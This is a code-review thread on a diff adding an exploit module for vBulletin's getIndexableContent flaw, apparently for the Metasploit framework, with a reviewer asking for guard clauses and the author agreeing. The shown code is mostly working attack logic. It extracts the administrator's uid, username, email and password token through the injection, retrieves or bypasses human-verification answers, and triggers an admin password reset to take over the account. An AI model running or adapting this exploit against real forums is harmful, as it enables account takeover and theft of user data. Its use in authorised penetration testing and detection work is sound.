modules/exploits/multi/http/vbulletin_getindexablecontent.rb

```diff
@@ -0,0 +1,663 @@
+        else
+          return CheckCode::Detected
+        end
+      end
+    else
+      vprint_error('Connection failed')
+      return CheckCode::Unknown
+    end
+
+    CheckCode::Safe
+  end
+
+  # Performs all exploit functionality
+  def exploit
+    super
+
+    # Get node_id for requests
+    node_id = get_node
+    fail_with(Failure::Unknown, 'Could not get a valid node id for the vBulletin install.') unless node_id
+
+    # Get vBulletin table prefix
+    table_prfx = get_table_prefix(node_id)
+    fail_with(Failure::UnexpectedReply, 'Could not determine the table prefix for the vBulletin install.') unless table_prfx
+
+    # Get admin info (email, uid, token)
+    admin_uid, admin_user, admin_token, admin_email = get_admin_info(node_id, table_prfx)
+    unless admin_uid && admin_user && admin_token && admin_email
+      fail_with(Failure::UnexpectedReply, 'Could not retrieve administrator uid, username, email and token.')
+    end
+    print_good("Retrieved administrator uid: #{admin_uid} user: #{admin_user} email: #{admin_email} and password: #{admin_token}")
+
+    if !datastore['MANUALLOSTPASS']
+      # Determine HV type
+      hv_type = get_hv_type
+
+      # Generate HV token and get answer
+      if hv_type == 'Image'
+        hv_hash = get_hv_hash
+        hv_answer = get_hv_answer(node_id, table_prfx, hv_hash)
+        unless hv_hash && hv_answer
+          fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification hash or answer.')
+        end
+      elsif hv_type == 'Question'
+        hv_hash = get_hv_hash
+        fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question hash.') unless hv_hash
+
+        ques_id = get_hv_answer(node_id, table_prfx, hv_hash)
+        fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question id.') unless ques_id
+
+        hv_question = get_hv_question(hv_hash)
+        hv_answer = get_hv_ques_answer(node_id, table_prfx, ques_id)
+        fail_with(Failure::UnexpectedReply, 'Could not retrieve human verification question or answer.') unless hv_question && hv_answer
+
+        print_good("Retrieved the HV question '#{hv_question}' and answer '#{hv_answer}' (regex).")
+      elsif hv_type == 'Recaptcha2'
+        fail_with(Failure::Unknown, "Site uses Recaptcha2, retry with MANUALLOSTPASS enabled and after a lost password request to an administrator account (#{admin_email})")
+      elsif hv_type == 'Disabled'
+
+      else
+        fail_with(Failure::Unknown, 'Invalid human verification type, you must request a new password for the administrator manually (and set MANUALLOSTPASS).')
+      end
+
+      # Make request to forget my password
+      brp_ret = begin_reset_pass(admin_email, hv_answer, hv_hash, hv_type)
+
+      # We fail here when the answer to the HV question contains a complex regex or is recaptcha2
+      fail_with(Failure::Unknown, 'Site requires captcha that we cannot bypass.') unless brp_ret
+    end
```

Comment:
Can this logic be simplified, perhaps with early return or guard clauses?

Reply:
I added a couple guard classes to the code above, let me know if you think it needs more. Thank you!